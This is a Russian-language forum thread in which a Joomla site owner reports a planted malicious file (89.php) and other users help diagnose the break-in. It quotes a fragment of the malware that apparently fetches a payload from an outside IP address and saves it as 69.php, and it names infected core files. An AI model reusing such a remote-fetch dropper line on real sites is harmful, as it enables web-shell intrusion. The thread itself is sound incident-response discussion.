Оставили подарок в корневом каталоге сайта - Безопасность сайтов на Joomla

файл 89.php

не забывайте обновлять систему

А шелл нашли, который этот файл создал?

А этот файл 69.php на другом сервере ?

@likrion
он такой красивый должен быть не один

А этот файл 69.php на другом сервере ?

Код

http://85.185.123.123/images/.x/x.txt','./69.php'

скорей всего на том что и 89

Версия php какая?

Со второй строчки все плохое скорее всего.

Версии найденных CMS
Joomla v3.3.3

Обновляться надо. Как видим RSFirewall бесполезен.

php 5.6.12, но сканировали сайт очень долго, на протяжении полугода....это первый взломанный у меня сайт..и наверное это станет сильным пинком для сознания онлайн firewall для сайтов..один неверный запрос и IP будет блокироваться на серверном уровне...надо уже прекращать этот бред и делать автоматику по сбору уязвимостей бессмысленной

Со второй строчки все плохое скорее всего.

Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?

Точнее не бывает, проверка на наличие определенного набора символов в запросе.
Сканер айболит запускался в параноидальном режиме?

нет

сайт.ру/libraries/library.php

сайт.ру/plugins/authentication/joomla/joomla.php

в шапке файла

Как видим RSFirewall бесполезен.

Я еще примерно пол года назад, где то тут в темах скидывал моменты обхода этого фаервола, а те кто проливают шелы, у них подобные моменты на вооружения, тут постоянно следить за сайтом надо....